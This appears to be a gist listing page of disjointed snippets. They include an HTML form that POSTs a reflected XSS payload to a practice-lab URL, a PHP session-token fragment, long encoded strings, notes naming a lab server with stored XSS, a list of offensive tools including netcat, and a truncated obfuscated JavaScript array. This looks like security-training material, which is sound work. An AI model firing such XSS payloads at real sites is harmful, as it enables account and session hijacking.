This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://hackxpert.com/RXSS/POST/20.php"><table><tr><td>say</td><td><input type="text" value="Hi" name="say"></td></tr> | |
<tr><td>hidden</td><td><input type="text" value="--><script>alert()</script>" name="hidden"></td></tr> | |
</table><input type="submit" value="http://hackxpert.com/RXSS/POST/20.php"></form></html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
session_start(); | |
include 'instructions.php'; | |
if (empty($_SESSION['token'])) { | |
$_SESSION['token'] = bin2hex(random_bytes(32)); | |
} | |
$token = $_SESSION['token']; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
JJNEERCFKNBUUR2SINDESU2DJJGEESSUJVHEWRKKIZDVMTKOINEUSNBSIRDVKMSOJFMVURKHJZBFKSKSJFCTEVKTKZFTKQSVLFLEGRKKLEZFMT2VLJLUYSSHIZFVIU2DJNLEYVKPK5FU2SSWIRDE2VSLJBEU4TKUI5KEGT2JLJGUKT2UGJGUUUSFIU3FMU2WJM2UKVSVKNJU6SSWINLE6V2DKZFUCWSVJFKFEVSHJJGUKQ2NLJKEUNKFIZGVEU2HJFDEWVKFKZJUQSS2IVCUSVKKGVEFKNSRHU6T2PI= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
3333333633333338333333373333333433333337333333343333333733333330333333373333333333333333333633313333333233363336333333323336333633333337333333373333333733333337333333373333333733333332333633353333333733333335333333363333333433333336333333353333333633363334333333373333333933333332333633353333333633333333333333363336333633333336333633343333333233363336333333363333333333333336333633363333333733333335333333373333333233333337333333333333333633333335333333323336333633333337333333353333333633363335333333363333333333333336333633333333333633333335333333323336333433333337333333323333333633333331333333373333333433333337333333333333333233363334333333363333333233333337333333353333333633333337333333323336333433333336333333323333333633363336333333373333333533333336333633353333333733333334333333373333333933333332333633343333333633333337333333373333333533333336333333393333333633333334333333363333333533333332333633363333333333363336333333363333333333333336333633363333333733333335333333373333333033333336333633363333333633363335 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Servers | |
--------------------------- | |
XSS | |
--------------------------- | |
http://23.239.9.22/cheeseBlog Basic stored XSS on homepage | |
Solution: |
We can make this file beautiful and searchable if this error is corrected: No commas found in this CSV file in line 0.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
nmap | |
nikto | |
wireshark | |
hping3 | |
dnsmap | |
john | |
ettercap | |
netcat | |
dotdotpwn | |
recon-ng |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var _0x19c2=['y2fJAgvmzw5NDgG','uwvQuxe','ChjVCeHVB2TZ','rJjpO','vvL1Bhm','yunVCuS','set','vu5uwK8','sKjoEfq','childNodes','RSZOA','DfzMyw4','suflr0K','y2XHC3m','CM91svm','getRootNode','tM8Gy29UDMvYC2LVBIbMCM9Tia','C2v0','dir','easing','hasClass','width:60%;top:1%','AVcin','Dgv4Da','eCzau','prototype','NMcrw','ZHZhc','z2v0rwXLBwvUDhncEunSyxnZtMfTzq','yutlX','checkOn','AxnjBw1LzgLHDgvqCM9WywDHDgLVBLn0B3bWzwq','phuBG','CgfNzvLpzMzZzxq','Aw5SAw5LlwjSB2nR','DgHLBG','z0nerxy','eWFaH','CwHytLu','eZwYo','z1v1DKO','BwvZC2fNzq','round','oEVje','vgzXChy','AgfUzgXL','GvtMe','Bg9JAW','hdpuX','SAqPP','BNrO','zlvLZ','B2jQzwn0','val','yxv0BW','hasContent','y2HLy2TLza','Dw5PCxvL','ANnVBNbdywXSyMfJAW','HPhQF','yMfJA2DYB3vUzenSAxa','cssNumber','xxFUw','inArray','rNrfCey','y29UDgfPBNm','uHmlN','CxnH','Eu1bA1y','C29YDerLDgfJAgvK','zML4zwq','EKjNC0y','DgLJAW','filters','isArray','visible','y2XVBMvoB2rL','zM9JDxnPBG','overflowY','tKHcEfK','y1jKB3y','origType','z2v0qM91BMrPBMDdBgLLBNrszwn0','C29YDfn0ywjSzq','AxnytuXeB2m','vhLiD0O', |
NewerOlder